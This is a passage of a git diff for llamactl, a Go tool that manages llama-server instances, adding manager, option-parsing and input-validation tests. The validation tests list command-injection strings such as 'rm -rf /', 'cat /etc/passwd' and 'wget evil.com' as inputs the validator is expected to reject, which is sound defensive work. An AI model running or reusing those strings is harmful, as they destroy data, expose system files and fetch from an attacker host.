:= []string{ + "--port", "0", + "--threads", "0", + "--temperature", "0", + "--model", "", + "--verbose", + } + + for _, excludedArg := range excludedArgs { + if contains(args, excludedArg) { + t.Errorf("Zero value argument %q should not be present in %v", excludedArg, args) + } + } +} + +func TestBuildCommandArgs_ArrayFields(t *testing.T) { + options := llamactl.LlamaServerOptions{ + Lora: []string{"adapter1.bin", "adapter2.bin"}, + OverrideTensor: []string{"tensor1", "tensor2", "tensor3"}, + DrySequenceBreaker: []string{".", "!", "?"}, + } + + args := options.BuildCommandArgs() + + // Check that each array value appears with its flag + expectedOccurrences := map[string][]string{ + "--lora": {"adapter1.bin", "adapter2.bin"}, + "--override-tensor": {"tensor1", "tensor2", "tensor3"}, + "--dry-sequence-breaker": {".", "!", "?"}, + } + + for flag, values := range expectedOccurrences { + for _, value := range values { + if !containsFlagWithValue(args, flag, value) { + t.Errorf("Expected %s %s, not found in %v", flag, value, args) + } + } + } +} + +func TestBuildCommandArgs_EmptyArrays(t *testing.T) { + options := llamactl.LlamaServerOptions{ + Lora: []string{}, // Empty array should not generate args + OverrideTensor: []string{}, // Empty array should not generate args + } + + args := options.BuildCommandArgs() + + excludedArgs := []string{"--lora", "--override-tensor"} + for _, excludedArg := range excludedArgs { + if contains(args, excludedArg) { + t.Errorf("Empty array should not generate argument %q in %v", excludedArg, args) + } + } +} + +func TestBuildCommandArgs_FieldNameConversion(t *testing.T) { + // Test snake_case to kebab-case conversion + options := llamactl.LlamaServerOptions{ + CtxSize: 4096, + GPULayers: 32, + ThreadsBatch: 2, + FlashAttn: true, + TopK: 40, + TopP: 0.9, + } + + args := options.BuildCommandArgs() + + // Check that field names are properly converted + expectedFlags := []string{ + "--ctx-size", // ctx_size -> ctx-size + "--gpu-layers", // gpu_layers -> gpu-layers + "--threads-batch", // threads_batch -> threads-batch + "--flash-attn", // flash_attn -> flash-attn + "--top-k", // top_k -> top-k + "--top-p", // top_p -> top-p + } + + for _, flag := range expectedFlags { + if !contains(args, flag) { + t.Errorf("Expected flag %q not found in %v", flag, args) + } + } +} + +func TestUnmarshalJSON_StandardFields(t *testing.T) { + jsonData := `{ + "model": "/path/to/model.gguf", + "port": 8080, + "host": "localhost", + "verbose": true, + "ctx_size": 4096, + "gpu_layers": 32, + "temperature": 0.7 + }` + + var options llamactl.LlamaServerOptions + err := json.Unmarshal([]byte(jsonData), &options) + if err != nil { + t.Fatalf("Unmarshal failed: %v", err) + } + + if options.Model != "/path/to/model.gguf" { + t.Errorf("Expected model '/path/to/model.gguf', got %q", options.Model) + } + if options.Port != 8080 { + t.Errorf("Expected port 8080, got %d", options.Port) + } + if options.Host != "localhost" { + t.Errorf("Expected host 'localhost', got %q", options.Host) + } + if !options.Verbose { + t.Error("Expected verbose to be true") + } + if options.CtxSize != 4096 { + t.Errorf("Expected ctx_size 4096, got %d", options.CtxSize) + } + if options.GPULayers != 32 { + t.Errorf("Expected gpu_layers 32, got %d", options.GPULayers) + } + if options.Temperature != 0.7 { + t.Errorf("Expected temperature 0.7, got %f", options.Temperature) + } +} + +func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) { + tests := []struct { + name string + jsonData string + checkFn func(llamactl.LlamaServerOptions) error + }{ + { + name: "threads alternatives", + jsonData: `{"t": 4, "tb": 2}`, + checkFn: func(opts llamactl.LlamaServerOptions) error { + if opts.Threads != 4 { + return fmt.Errorf("expected threads 4, got %d", opts.Threads) + } + if opts.ThreadsBatch != 2 { + return fmt.Errorf("expected threads_batch 2, got %d", opts.ThreadsBatch) + } + return nil + }, + }, + { + name: "context size alternatives", + jsonData: `{"c": 2048}`, + checkFn: func(opts llamactl.LlamaServerOptions) error { + if opts.CtxSize != 2048 { + return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize) + } + return nil + }, + }, + { + name: "gpu layers alternatives", + jsonData: `{"ngl": 16}`, + checkFn: func(opts llamactl.LlamaServerOptions) error { + if opts.GPULayers != 16 { + return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers) + } + return nil + }, + }, + { + name: "model alternatives", + jsonData: `{"m": "/path/model.gguf"}`, + checkFn: func(opts llamactl.LlamaServerOptions) error { + if opts.Model != "/path/model.gguf" { + return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model) + } + return nil + }, + }, + { + name: "temperature alternatives", + jsonData: `{"temp": 0.8}`, + checkFn: func(opts llamactl.LlamaServerOptions) error { + if opts.Temperature != 0.8 { + return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature) + } + return nil + }, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + var options llamactl.LlamaServerOptions + err := json.Unmarshal([]byte(tt.jsonData), &options) + if err != nil { + t.Fatalf("Unmarshal failed: %v", err) + } + + if err := tt.checkFn(options); err != nil { + t.Error(err) + } + }) + } +} + +func TestUnmarshalJSON_InvalidJSON(t *testing.T) { + invalidJSON := `{"port": "not-a-number", "invalid": syntax}` + + var options llamactl.LlamaServerOptions + err := json.Unmarshal([]byte(invalidJSON), &options) + if err == nil { + t.Error("Expected error for invalid JSON") + } +} + +func TestUnmarshalJSON_ArrayFields(t *testing.T) { + jsonData := `{ + "lora": ["adapter1.bin", "adapter2.bin"], + "override_tensor": ["tensor1", "tensor2"], + "dry_sequence_breaker": [".", "!", "?"] + }` + + var options llamactl.LlamaServerOptions + err := json.Unmarshal([]byte(jsonData), &options) + if err != nil { + t.Fatalf("Unmarshal failed: %v", err) + } + + expectedLora := []string{"adapter1.bin", "adapter2.bin"} + if !reflect.DeepEqual(options.Lora, expectedLora) { + t.Errorf("Expected lora %v, got %v", expectedLora, options.Lora) + } + + expectedTensors := []string{"tensor1", "tensor2"} + if !reflect.DeepEqual(options.OverrideTensor, expectedTensors) { + t.Errorf("Expected override_tensor %v, got %v", expectedTensors, options.OverrideTensor) + } + + expectedBreakers := []string{".", "!", "?"} + if !reflect.DeepEqual(options.DrySequenceBreaker, expectedBreakers) { + t.Errorf("Expected dry_sequence_breaker %v, got %v", expectedBreakers, options.DrySequenceBreaker) + } +} + +// Helper functions +func contains(slice []string, item string) bool { + return slices.Contains(slice, item) +} + +func containsFlagWithValue(args []string, flag, value string) bool { + for i, arg := range args { + if arg == flag { + // Check if there's a next argument and it matches the expected value + if i+1 < len(args) && args[i+1] == value { + return true + } + } + } + return false +} diff --git a/pkg/manager.go b/pkg/manager.go index f98a864..b7808a9 100644 --- a/pkg/manager.go +++ b/pkg/manager.go @@ -53,6 +53,10 @@ func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOp return nil, fmt.Errorf("instance options cannot be nil") } + if len(im.instances) >= im.instancesConfig.MaxInstances && im.instancesConfig.MaxInstances != -1 { + return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances) + } + err := ValidateInstanceName(name) if err != nil { return nil, err @@ -78,10 +82,17 @@ func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOp return nil, fmt.Errorf("failed to get next available port: %w", err) } options.Port = port + } else { + // Validate the specified port + if _, exists := im.ports[options.Port]; exists { + return nil, fmt.Errorf("port %d is already in use", options.Port) + } + im.ports[options.Port] = true } instance := NewInstance(name, &im.instancesConfig, options) im.instances[instance.Name] = instance + im.ports[options.Port] = true return instance, nil } @@ -155,6 +166,7 @@ func (im *instanceManager) DeleteInstance(name string) error { return fmt.Errorf("instance with name %s is still running, stop it before deleting", name) } + delete(im.ports, im.instances[name].options.Port) delete(im.instances, name) return nil } diff --git a/pkg/manager_test.go b/pkg/manager_test.go new file mode 100644 index 0000000..5a5cfa8 --- /dev/null +++ b/pkg/manager_test.go @@ -0,0 +1,501 @@ +package llamactl_test + +import ( + "strings" + "testing" + + llamactl "llamactl/pkg" +) + +func TestNewInstanceManager(t *testing.T) { + config := llamactl.InstancesConfig{ + PortRange: [2]int{8000, 9000}, + LogDirectory: "/tmp/test", + MaxInstances: 5, + LlamaExecutable: "llama-server", + DefaultAutoRestart: true, + DefaultMaxRestarts: 3, + DefaultRestartDelay: 5, + } + + manager := llamactl.NewInstanceManager(config) + if manager == nil { + t.Fatal("NewInstanceManager returned nil") + } + + // Test initial state + instances, err := manager.ListInstances() + if err != nil { + t.Fatalf("ListInstances failed: %v", err) + } + if len(instances) != 0 { + t.Errorf("Expected empty instance list, got %d instances", len(instances)) + } +} + +func TestCreateInstance_Success(t *testing.T) { + manager := createTestManager() + + options := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + Port: 8080, + }, + } + + instance, err := manager.CreateInstance("test-instance", options) + if err != nil { + t.Fatalf("CreateInstance failed: %v", err) + } + + if instance.Name != "test-instance" { + t.Errorf("Expected instance name 'test-instance', got %q", instance.Name) + } + if instance.Running { + t.Error("New instance should not be running") + } + if instance.GetOptions().Port != 8080 { + t.Errorf("Expected port 8080, got %d", instance.GetOptions().Port) + } +} + +func TestCreateInstance_DuplicateName(t *testing.T) { + manager := createTestManager() + + options1 := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, + } + + options2 := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, + } + + // Create first instance + _, err := manager.CreateInstance("test-instance", options1) + if err != nil { + t.Fatalf("First CreateInstance failed: %v", err) + } + + // Try to create duplicate + _, err = manager.CreateInstance("test-instance", options2) + if err == nil { + t.Error("Expected error for duplicate instance name") + } + if !strings.Contains(err.Error(), "already exists") { + t.Errorf("Expected duplicate name error, got: %v", err) + } +} + +func TestCreateInstance_MaxInstancesLimit(t *testing.T) { + // Create manager with low max instances limit + config := llamactl.InstancesConfig{ + PortRange: [2]int{8000, 9000}, + MaxInstances: 2, // Very low limit for testing + } + manager := llamactl.NewInstanceManager(config) + + options1 := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, + } + + options2 := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, + } + + options3 := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, + } + + // Create instances up to the limit + _, err := manager.CreateInstance("instance1", options1) + if err != nil { + t.Fatalf("CreateInstance 1 failed: %v", err) + } + + _, err = manager.CreateInstance("instance2", options2) + if err != nil { + t.Fatalf("CreateInstance 2 failed: %v", err) + } + + // This should fail due to max instances limit + _, err = manager.CreateInstance("instance3", options3) + if err == nil { + t.Error("Expected error when exceeding max instances limit") + } + if !strings.Contains(err.Error(), "maximum number of instances") && !strings.Contains(err.Error(), "limit") { + t.Errorf("Expected max instances error, got: %v", err) + } +} + +func TestCreateInstance_PortAssignment(t *testing.T) { + manager := createTestManager() + + // Create instance without specifying port + options := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, + } + + instance, err := manager.CreateInstance("test-instance", options) + if err != nil { + t.Fatalf("CreateInstance failed: %v", err) + } + + // Should auto-assign a port in the range + port := instance.GetOptions().Port + if port < 8000 || port > 9000 { + t.Errorf("Expected port in range 8000-9000, got %d", port) + } +} + +func TestCreateInstance_PortConflictDetection(t *testing.T) { + manager := createTestManager() + + options1 := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + Port: 8080, // Explicit port + }, + } + + options2 := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model2.gguf", + Port: 8080, // Same port - should conflict + }, + } + + // Create first instance + _, err := manager.CreateInstance("instance1", options1) + if err != nil { + t.Fatalf("CreateInstance 1 failed: %v", err) + } + + // Try to create second instance with same port + _, err = manager.CreateInstance("instance2", options2) + if err == nil { + t.Error("Expected error for port conflict") + } + if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "conflict") && !strings.Contains(err.Error(), "in use") { + t.Errorf("Expected port conflict error, got: %v", err) + } +} + +func TestCreateInstance_MultiplePortAssignment(t *testing.T) { + manager := createTestManager() + + options1 := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, + } + + options2 := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, + } + + // Create multiple instances and verify they get different ports + instance1, err := manager.CreateInstance("instance1", options1) + if err != nil { + t.Fatalf("CreateInstance 1 failed: %v", err) + } + + instance2, err := manager.CreateInstance("instance2", options2) + if err != nil { + t.Fatalf("CreateInstance 2 failed: %v", err) + } + + port1 := instance1.GetOptions().Port + port2 := instance2.GetOptions().Port + + if port1 == port2 { + t.Errorf("Expected different ports, both got %d", port1) + } +} + +func TestCreateInstance_PortExhaustion(t *testing.T) { + // Create manager with very small port range + config := llamactl.InstancesConfig{ + PortRange: [2]int{8000, 8001}, // Only 2 ports available + MaxInstances: 10, // Higher than available ports + } + manager := llamactl.NewInstanceManager(config) + + options1 := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, + } + + options2 := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, + } + + options3 := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, + } + + // Create instances to exhaust all ports + _, err := manager.CreateInstance("instance1", options1) + if err != nil { + t.Fatalf("CreateInstance 1 failed: %v", err) + } + + _, err = manager.CreateInstance("instance2", options2) + if err != nil { + t.Fatalf("CreateInstance 2 failed: %v", err) + } + + // This should fail due to port exhaustion + _, err = manager.CreateInstance("instance3", options3) + if err == nil { + t.Error("Expected error when ports are exhausted") + } + if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "available") { + t.Errorf("Expected port exhaustion error, got: %v", err) + } +} + +func TestDeleteInstance_PortRelease(t *testing.T) { + manager := createTestManager() + + options := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + Port: 8080, + }, + } + + // Create instance with specific port + _, err := manager.CreateInstance("test-instance", options) + if err != nil { + t.Fatalf("CreateInstance failed: %v", err) + } + + // Delete the instance + err = manager.DeleteInstance("test-instance") + if err != nil { + t.Fatalf("DeleteInstance failed: %v", err) + } + + // Should be able to create new instance with same port + _, err = manager.CreateInstance("new-instance", options) + if err != nil { + t.Errorf("Expected to reuse port after deletion, got error: %v", err) + } +} + +func TestGetInstance_Success(t *testing.T) { + manager := createTestManager() + + // Create an instance first + options := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, + } + created, err := manager.CreateInstance("test-instance", options) + if err != nil { + t.Fatalf("CreateInstance failed: %v", err) + } + + // Retrieve it + retrieved, err := manager.GetInstance("test-instance") + if err != nil { + t.Fatalf("GetInstance failed: %v", err) + } + + if retrieved.Name != created.Name { + t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name) + } +} + +func TestGetInstance_NotFound(t *testing.T) { + manager := createTestManager() + + _, err := manager.GetInstance("nonexistent") + if err == nil { + t.Error("Expected error for nonexistent instance") + } + if !strings.Contains(err.Error(), "not found") { + t.Errorf("Expected 'not found' error, got: %v", err) + } +} + +func TestListInstances(t *testing.T) { + manager := createTestManager() + + // Initially empty + instances, err := manager.ListInstances() + if err != nil { + t.Fatalf("ListInstances failed: %v", err) + } + if len(instances) != 0 { + t.Errorf("Expected 0 instances, got %d", len(instances)) + } + + // Create some instances + options1 := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, + } + + options2 := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, + } + + _, err = manager.CreateInstance("instance1", options1) + if err != nil { + t.Fatalf("CreateInstance 1 failed: %v", err) + } + + _, err = manager.CreateInstance("instance2", options2) + if err != nil { + t.Fatalf("CreateInstance 2 failed: %v", err) + } + + // List should return both + instances, err = manager.ListInstances() + if err != nil { + t.Fatalf("ListInstances failed: %v", err) + } + if len(instances) != 2 { + t.Errorf("Expected 2 instances, got %d", len(instances)) + } + + // Check names are present + names := make(map[string]bool) + for _, instance := range instances { + names[instance.Name] = true + } + if !names["instance1"] || !names["instance2"] { + t.Error("Expected both instance1 and instance2 in list") + } +} + +func TestDeleteInstance_Success(t *testing.T) { + manager := createTestManager() + + // Create an instance + options := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, + } + _, err := manager.CreateInstance("test-instance", options) + if err != nil { + t.Fatalf("CreateInstance failed: %v", err) + } + + // Delete it + err = manager.DeleteInstance("test-instance") + if err != nil { + t.Fatalf("DeleteInstance failed: %v", err) + } + + // Should no longer exist + _, err = manager.GetInstance("test-instance") + if err == nil { + t.Error("Instance should not exist after deletion") + } +} + +func TestDeleteInstance_NotFound(t *testing.T) { + manager := createTestManager() + + err := manager.DeleteInstance("nonexistent") + if err == nil { + t.Error("Expected error for deleting nonexistent instance") + } + if !strings.Contains(err.Error(), "not found") { + t.Errorf("Expected 'not found' error, got: %v", err) + } +} + +func TestUpdateInstance_Success(t *testing.T) { + manager := createTestManager() + + // Create an instance + options := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + Port: 8080, + }, + } + _, err := manager.CreateInstance("test-instance", options) + if err != nil { + t.Fatalf("CreateInstance failed: %v", err) + } + + // Update it + newOptions := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/new-model.gguf", + Port: 8081, + }, + } + + updated, err := manager.UpdateInstance("test-instance", newOptions) + if err != nil { + t.Fatalf("UpdateInstance failed: %v", err) + } + + if updated.GetOptions().Model != "/path/to/new-model.gguf" { + t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model) + } + if updated.GetOptions().Port != 8081 { + t.Errorf("Expected port 8081, got %d", updated.GetOptions().Port) + } +} + +func TestUpdateInstance_NotFound(t *testing.T) { + manager := createTestManager() + + options := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + }, + } + + _, err := manager.UpdateInstance("nonexistent", options) + if err == nil { + t.Error("Expected error for updating nonexistent instance") + } + if !strings.Contains(err.Error(), "not found") { + t.Errorf("Expected 'not found' error, got: %v", err) + } +} + +// Helper function to create a test manager with standard config +func createTestManager() llamactl.InstanceManager { + config := llamactl.InstancesConfig{ + PortRange: [2]int{8000, 9000}, + LogDirectory: "/tmp/test", + MaxInstances: 10, + LlamaExecutable: "llama-server", + DefaultAutoRestart: true, + DefaultMaxRestarts: 3, + DefaultRestartDelay: 5, + } + return llamactl.NewInstanceManager(config) +} diff --git a/pkg/validation.go b/pkg/validation.go index 00804d6..78e99a6 100644 --- a/pkg/validation.go +++ b/pkg/validation.go @@ -13,6 +13,7 @@ var ( regexp.MustCompile(`[;&|$` + "`" + `]`), // Shell metacharacters regexp.MustCompile(`\$\(.*\)`), // Command substitution $(...) regexp.MustCompile("`.*`"), // Command substitution backticks + regexp.MustCompile(`[\x00-\x1F\x7F]`), // Control characters (including newline, tab, null byte, etc.) } // Simple validation for instance names diff --git a/pkg/validation_test.go b/pkg/validation_test.go new file mode 100644 index 0000000..baf6466 --- /dev/null +++ b/pkg/validation_test.go @@ -0,0 +1,263 @@ +package llamactl_test + +import ( + "strings" + "testing" + + llamactl "llamactl/pkg" +) + +func TestValidateInstanceName(t *testing.T) { + tests := []struct { + name string + input string + wantErr bool + }{ + // Valid names + {"simple name", "myinstance", false}, + {"with numbers", "instance123", false}, + {"with hyphens", "my-instance", false}, + {"with underscores", "my_instance", false}, + {"mixed valid chars", "test-instance_123", false}, + {"single char", "a", false}, + {"max length", strings.Repeat("a", 50), false}, + + // Invalid names - basic validation + {"empty name", "", true}, + {"with spaces", "my instance", true}, + {"with dots", "my.instance", true}, + {"with special chars", "my@instance", true}, + {"too long", strings.Repeat("a", 51), true}, + + // Invalid names - injection prevention + {"shell metachar semicolon", "test;ls", true}, + {"shell metachar pipe", "test|ls", true}, + {"shell metachar ampersand", "test&ls", true}, + {"shell metachar dollar", "test$var", true}, + {"shell metachar backtick", "test`cmd`", true}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + err := llamactl.ValidateInstanceName(tt.input) + if (err != nil) != tt.wantErr { + t.Errorf("ValidateInstanceName(%q) error = %v, wantErr %v", tt.input, err, tt.wantErr) + } + }) + } +} + +func TestValidateInstanceOptions_NilOptions(t *testing.T) { + err := llamactl.ValidateInstanceOptions(nil) + if err == nil { + t.Error("Expected error for nil options") + } + if !strings.Contains(err.Error(), "options cannot be nil") { + t.Errorf("Expected 'options cannot be nil' error, got: %v", err) + } +} + +func TestValidateInstanceOptions_PortValidation(t *testing.T) { + tests := []struct { + name string + port int + wantErr bool + }{ + {"valid port 0", 0, false}, // 0 means auto-assign + {"valid port 80", 80, false}, + {"valid port 8080", 8080, false}, + {"valid port 65535", 65535, false}, + {"negative port", -1, true}, + {"port too high", 65536, true}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + options := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Port: tt.port, + }, + } + + err := llamactl.ValidateInstanceOptions(options) + if (err != nil) != tt.wantErr { + t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr) + } + }) + } +} + +func TestValidateInstanceOptions_StringInjection(t *testing.T) { + tests := []struct { + name string + value string + wantErr bool + }{ + // Safe strings - these should all pass + {"simple string", "model.gguf", false}, + {"path with slashes", "/path/to/model.gguf", false}, + {"with spaces", "my model file.gguf", false}, + {"with numbers", "model123.gguf", false}, + {"with dots", "model.v2.gguf", false}, + {"with equals", "param=value", false}, + {"with quotes", `"quoted string"`, false}, + {"empty string", "", false}, + {"with dashes", "model-name", false}, + {"with underscores", "model_name", false}, + + // Dangerous strings - command injection attempts + {"semicolon injection", "model.gguf; rm -rf /", true}, + {"pipe injection", "model.gguf | cat /etc/passwd", true}, + {"ampersand injection", "model.gguf & wget evil.com", true}, + {"dollar injection", "model.gguf $HOME", true}, + {"backtick injection", "model.gguf `cat /etc/passwd`", true}, + {"command substitution", "model.gguf $(whoami)", true}, + {"multiple metacharacters", "model.gguf; cat /etc/passwd | grep root", true}, + + // Control character injection attempts + {"newline injection", "model.gguf\nrm -rf /", true}, + {"carriage return", "model.gguf\rrm -rf /", true}, + {"tab injection", "model.gguf\trm -rf /", true}, + {"null byte", "model.gguf\x00rm -rf /", true}, + {"form feed", "model.gguf\frm -rf /", true}, + {"vertical tab", "model.gguf\vrm -rf /", true}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + // Test with Model field (string field) + options := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: tt.value, + }, + } + + err := llamactl.ValidateInstanceOptions(options) + if (err != nil) != tt.wantErr { + t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr) + } + }) + } +} + +func TestValidateInstanceOptions_ArrayInjection(t *testing.T) { + tests := []struct { + name string + array []string + wantErr bool + }{ + // Safe arrays + {"empty array", []string{}, false}, + {"single safe item", []string{"value1"}, false}, + {"multiple safe items", []string{"value1", "value2", "value3"}, false}, + {"paths", []string{"/path/to/file1", "/path/to/file2"}, false}, + + // Dangerous arrays - injection in different positions + {"injection in first item", []string{"value1; rm -rf /", "value2"}, true}, + {"injection in middle item", []string{"value1", "value2 | cat /etc/passwd", "value3"}, true}, + {"injection in last item", []string{"value1", "value2", "value3 & wget evil.com"}, true}, + {"command substitution", []string{"$(whoami)", "value2"}, true}, + {"backtick injection", []string{"value1", "`cat /etc/passwd`"}, true}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + // Test with Lora field (array field) + options := &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Lora: tt.array, + }, + } + + err := llamactl.ValidateInstanceOptions(options) + if (err != nil) != tt.wantErr { + t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr) + } + }) + } +} + +func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) { + // Test that injection in any field is caught + tests := []struct { + name string + options *llamactl.CreateInstanceOptions + wantErr bool + }{ + { + name: "injection in model field", + options: &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "safe.gguf", + HFRepo: "microsoft/model; curl evil.com", + }, + }, + wantErr: true, + }, + { + name: "injection in log file", + options: &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "safe.gguf", + LogFile: "/tmp/log.txt | tee /etc/passwd", + }, + }, + wantErr: true, + }, + { + name: "all safe fields", + options: &llamactl.CreateInstanceOptions{ + LlamaServerOptions: llamactl.LlamaServerOptions{ + Model: "/path/to/model.gguf", + HFRepo: "microsoft/DialoGPT-medium", + LogFile: "/tmp/llama.log", + Device: "cuda:0", + Port: 8080, + }, + }, + wantErr: false, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + err := llamactl.ValidateInstanceOptions(tt.options) + if (err != nil) != tt.wantErr { + t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr) + } + }) + } +} + +func TestValidateInstanceOptions_NonStringFields(t *testing.T) { + // Test that non-string fields don't interfere with validation + options := &llamactl.CreateInstanceOptions{ + AutoRestart: boolPtr(true), + MaxRestarts: intPtr(5), + RestartDelay: intPtr(10), + LlamaServerOptions: llamactl.LlamaServerOptions{ + Port: 8080, + GPULayers: 32, + CtxSize: 4096, + Temperature: 0.7, + TopK: 40, + TopP: 0.9, + Verbose: true, + FlashAttn: false, + }, + } + + err := llamactl.ValidateInstanceOptions(options) + if err != nil { + t.Errorf("ValidateInstanceOptions with non-string fields should not error, got: %v", err) + } +} + +// Helper functions for pointer fields +func boolPtr(b bool) *bool { + return &b +} + +func intPtr(i int) *int { + return &i +}